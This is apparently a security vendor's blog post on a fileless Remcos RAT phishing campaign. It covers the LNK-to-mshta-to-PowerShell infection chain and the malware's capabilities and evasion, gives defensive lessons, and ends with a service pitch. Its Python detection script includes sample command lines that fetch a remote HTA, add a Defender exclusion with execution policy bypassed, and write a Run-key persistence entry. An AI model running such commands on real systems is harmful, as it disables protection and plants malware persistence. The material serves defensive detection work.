The new fileless attack: Remcos RAT delivered via LNK file in a phishing campaign

Introduction

Fileless cyberattacks are becoming increasingly common in today's threat landscape. These attacks execute malicious code directly in system memory, often using legitimate system utilities instead of saving infected files to disk. As a result, fileless malware leaves few traces and frequently evades traditional file-based detection mechanisms.

Simultaneously, recent platform security changes (e.g., Microsoft's blocking of Office macros) have forced criminals to explore new delivery vectors, such as Windows shortcut files (.LNK) attached in phishing emails.

A striking and alarming example of this evolution is a recent phishing campaign uncovered by researchers, where the remote access trojan (RAT) Remcos is distributed in a fileless manner via a malicious LNK file attached to a phishing email. This delivery method combines social engineering with the abuse of legitimate, signed system components, making the attack particularly dangerous. While Remcos RAT has previously appeared in fileless forms—notably in a November 2024 campaign using fake purchase orders and Office exploits—the new LNK-based vector highlights a higher level of sophistication and the need for increased awareness.

The following sections examine in detail who the attackers might be and how they operate, the technical infection chain, what Remcos RAT is and what it can do once infiltrated, the primary victim profiles, how the malware evades detection and persists, and key cybersecurity lessons to draw from this incident. The tone is professional but accessible, aiming to help both everyday users and companies understand the risks and protection strategies.

Who are the attackers and how does the attack work?

While the exact identity of the attackers in this campaign is unknown, the complexity of the operation suggests a well-organized cybercriminal group with financial or espionage motives. Remcos RAT is widely available on underground forums and has been used by various threat actors, from lone hackers to medium-level APT groups. The target appears to be opportunistic—whoever takes the bait—with attackers leveraging timely themes (tax documents) to increase open rates.

Here's how the infection chain unfolds:

  1. Phishing Email and Malicious LNK File: The victim receives a phishing email with a ZIP archive attachment. Inside the archive is a Windows shortcut file (.LNK), disguised as a legitimate document (e.g., a tax form). Once the user unzips and double-clicks the .LNK file, a chain of malicious commands is triggered.
  2. Abuse of mshta.exe: The .LNK file launches the legitimate Windows utility mshta.exe, used to execute HTML Applications (.HTA files). It points to a remote HTA file hosted on a server controlled by the attacker.
  3. Execution of VBScript in HTA File: The HTA file contains obfuscated VBScript that:
    • Adds a public folder to Windows Defender exclusions.
    • Sets PowerShell execution policy to Bypass.
    • Downloads additional files (a decoy PDF, another HTA file, a PowerShell script).
    • Adds a registry key for persistence.
  4. PowerShell In-Memory Execution: The downloaded PowerShell script is heavily obfuscated and executed with powershell.exe. It decodes embedded shellcode and injects it into memory using Windows API calls. The final payload, Remcos RAT, is launched directly in memory.
  5. C2 Connection: Once running, Remcos connects to its command-and-control (C2) server to receive commands and exfiltrate data. In this campaign, it used the domain readysteaurants[.]com.
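As an added illustration (not code from the original research or from the Remcos campaign itself), the following Python snippet runs a handful of behavioural rules, one per stage of the chain above, over constructed process-creation events in a Sysmon-like shape. The event fields, the HTA hostname, the file paths and the registry value name are assumptions chosen for the sample.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
# Event 1-3 mimic the LNK -> mshta -> PowerShell chain; event 4 is benign noise.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://hta-host.example/tax_form.hta"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -ep Bypass -w hidden -c "Add-MpPreference -ExclusionPath C:\\Users\\Public"'},
    {"parent": "mshta.exe", "image": "reg.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\update.hta"},
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe C:\\docs\\report.docx"},
]

# Each rule maps to one stage of the infection chain described in the article.
RULES = {
    # Stage 2: mshta.exe fetching an HTA from a remote URL instead of a local file.
    "mshta_remote_hta": lambda e: e["image"] == "mshta.exe"
        and re.search(r"https?://", e["cmdline"], re.I) is not None,
    # Stage 3a: a Defender exclusion being added from a script.
    "defender_exclusion": lambda e: "add-mppreference" in e["cmdline"].lower()
        and "-exclusionpath" in e["cmdline"].lower(),
    # Stage 3b: PowerShell launched with the execution policy set to Bypass.
    "ps_execution_policy_bypass": lambda e: e["image"] == "powershell.exe"
        and re.search(r"-e(xecutionpolicy|p)\s+bypass", e["cmdline"], re.I) is not None,
    # Stage 3c: a Run key being written for persistence.
    "run_key_persistence": lambda e: re.search(
        r"\\CurrentVersion\\Run\b", e["cmdline"], re.I) is not None,
    # Stage 4: a script host spawned by mshta.exe (unusual parent/child pairing).
    "script_host_child_of_mshta": lambda e: e["parent"] == "mshta.exe"
        and e["image"] in {"powershell.exe", "wscript.exe", "cmd.exe"},
}

def match_rules(event):
    """Return the names of all rules that fire for one event."""
    return [name for name, pred in RULES.items() if pred(event)]

def chain_score(events):
    """Number of distinct chain stages observed across the events.
    Several distinct stages on one host is a far stronger signal than any single hit."""
    return len({name for e in events for name in match_rules(e)})

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["image"], "->", match_rules(e) or "no match")
    print("distinct stages observed:", chain_score(SAMPLE_EVENTS))
```

In a real deployment the rules would be fed from Sysmon or EDR process telemetry and the score evaluated per host over a short window; a single mshta.exe hit is noisy, while three or more stages together on one machine warrants isolation.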

What is Remcos RAT and what does it do?

Remcos RAT (Remote Control and Surveillance) is a powerful and versatile remote access trojan. Initially marketed as a legitimate remote administration tool, it has been heavily abused by cybercriminals.

Capabilities include:

  • System reconnaissance (OS version, IP, hostname, installed software)
  • Keylogging (records all keystrokes)
  • Clipboard monitoring
  • Screenshot capture
  • Remote command execution
  • Data exfiltration via encrypted TLS channels

Once active, Remcos gives attackers full control over the infected system, including installing additional malware, spying through webcam/microphone (in some variants), and pivoting within networks. It operates silently, with no visible UI, and hides under legitimate process names.

Who are the primary targets?

Targets include both individuals and organizations:

  • Individuals: May be tricked by fake tax documents and phishing emails. Risk includes credential theft, financial fraud, or surveillance.
  • Organizations: Especially accounting or finance departments handling sensitive documents. Attackers could use initial access for lateral movement, data theft, or launching ransomware.

Motives are primarily financial: stolen data can be sold on the black market or used for fraud.

Evasion and Persistence Techniques

Remcos RAT uses multiple techniques to evade detection and maintain persistence:

  • Fileless execution: Shellcode and payload are loaded entirely in memory.
  • Living-off-the-land binaries (LOLBins): Uses legitimate tools like mshta.exe, wscript.exe, and powershell.exe.
  • Obfuscation: Scripts and payloads are heavily encoded to avoid signature-based detection.
  • Windows Defender evasion: Excludes its working directory from scans.
  • Registry persistence: Adds entries to run at startup.
  • Encrypted communication: Uses TLS to mask traffic.

These features make detection by traditional AV difficult. Without behavior-based monitoring or endpoint detection and response (EDR), such attacks can go unnoticed.

Cybersecurity Lessons

Key takeaways from this incident:

  • User education: Train users to spot phishing emails and suspicious attachments (e.g., .LNK inside ZIP).
  • Email filtering: Block risky attachments and scan contents of ZIPs.
  • Behavior-based endpoint protection: Use EDR to detect LOLBin abuse or memory injection.
  • PowerShell and script monitoring: Log and alert on suspicious script activity.
  • Restrict execution of mshta.exe and similar tools where not needed.
  • Limit user privileges: Least privilege reduces malware impact.
  • Backup and incident response plans: Prepare for rapid isolation and recovery.

Final Thoughts and Call to Action

This campaign shows that modern malware doesn’t need files to be dangerous. Remcos RAT’s fileless delivery and stealthy operation make it a serious threat for users and organizations alike. As attackers evolve, so must our defenses.

At Hack & Fix, we specialize in proactive cybersecurity assessments and custom protection strategies. Don’t wait for an incident to strike.

Proactive defense is no longer optional. Stay ahead of the threats. Let Hack & Fix secure your digital environment before it's too late.